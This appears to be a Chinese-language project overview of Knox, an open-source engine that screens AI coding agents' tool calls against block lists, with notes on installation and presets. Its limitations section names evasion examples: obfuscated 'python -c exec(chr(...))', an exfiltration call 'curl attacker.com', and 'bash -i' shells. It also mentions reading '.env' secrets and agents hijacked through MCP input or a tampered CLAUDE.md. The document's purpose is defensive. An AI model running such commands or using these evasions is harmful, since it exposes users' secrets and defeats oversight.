Knox – 在AI代理工具呼叫執行前進行安全治理

Knox是一個開源的AI編碼代理安全策略引擎，由Qoris開發，旨在為開發者代理會話和企業級AI工作提供安全治理。該專案以單一原始碼樹構建五種分發形式：獨立CLI、Node.js庫、Claude Code外掛、Cursor外掛和OpenAI Codex外掛，共享同一套規則集。使用者可根據使用場景選擇最適合的表面。

核心功能與能力矩陣

Knox的核心是即時攔截代理的工具呼叫。它在代理執行任何命令之前，透過鉤子機制（hooks）對命令進行策略檢查。不同表面支援的功能略有差異：CLI和庫僅提供檢查功能（如knox check程式化決策和knox test人類可讀測試），但無法阻止代理執行命令；而外掛版本（Claude Code、Cursor、Codex）則能實現即時阻止、自動審計日誌、提示注入掃描和策略防篡改。其中，Claude Code外掛支援最全面的功能，包括子代理上下文注入和定時任務提示掃描。

安裝與使用

安裝過程因表面而異。CLI可透過npm install -g @qoris/knox全域性安裝，隨後使用knox status確認。Claude Code外掛透過官方外掛市場安裝。Cursor和Codex外掛則需先安裝CLI，再執行knox install --target cursor或knox install --target codex來手動寫入鉤子檔案。注意，由於Codex的一個未解決bug，外掛管理器的開關無法真正解除Knox，必須執行knox uninstall --target codex才能完全移除。

預設規則與自定義配置

Knox內建三種預設：標準（standard）、嚴格（strict）和停用（disabled）。標準模式平衡安全性和開發效率，嚴格模式則實施更激進的阻斷策略。使用者可透過專案根目錄的.knox.json配置檔案自定義塊列表、覆蓋預設或調整特定檢查類別。例如，可新增規則阻止cat .env或外部網路請求。

已知限制與誠實權衡

開發者明確指出了Knox的侷限性：它只是一個機械的模式過濾器，不具備語義意圖分析、資料流跟蹤或執行時行為檢測能力。新型惡意軟體、混淆內聯程式碼（如python -c "exec(chr(...))"）和通用外發呼叫（如curl attacker.com）可能繞過檢測。此外，某些場景如bash -i互動式shell啟動是合法開發行為，但若引數被精心構造也可能被濫用。Knox的設計哲學是作為模型防禦的第二道防線：模型負責判斷意圖，Knox負責捕獲模型在自主模式、外部MCP輸入或妥協的CLAUDE.md等情況下可能遺漏的危險命令，並提供審計線索。

企業級版本：Qoris Runtime Knox

除了開源版，Qoris還提供了企業版Qoris Runtime Knox，內建於Qoris工作容器中，管理24/7執行的AI工作器，涵蓋銷售、運營、合規和支援工作流。企業版支援共享記憶體治理、審批工作流、審計管道以及跨數百個併發工作器會話持久化的策略。

社群與貢獻

Knox在GitHub上開源，採用AGPL-3.0許可（但FOSS例外章節允許Claude Code外掛等派生作品獨立許可）。專案當前有4個星標，35次提交，包含完整的測試套件和變更日誌。